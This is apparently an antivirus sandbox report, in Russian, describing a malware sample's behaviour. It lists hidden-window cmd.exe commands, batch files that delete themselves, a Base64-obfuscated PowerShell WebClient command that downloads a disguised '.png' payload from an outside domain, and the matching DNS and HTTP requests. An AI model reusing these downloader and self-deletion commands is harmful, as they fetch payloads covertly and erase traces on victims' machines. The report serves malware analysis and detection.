Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c mkdir C:\Users\Public\tmpdir
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat
- '<SYSTEM32>\cmd.exe' /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')),...
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\tmpdir\tmps1.bat
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\tmp.bat
- C:\users\public\tmpdir\tmps1.bat
- %HOMEPATH%\application data\microsoft\forms\winword.box
Сетевая активность
TCP
Запросы HTTP GET
- http://sa##adm.com/tcphx/8888888.png
UDP
- DNS ASK sa##adm.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c mkdir C:\Users\Public\tmpdir' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')),...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\tmpdir\tmps1.bat' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 1
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 65
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 2
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 2
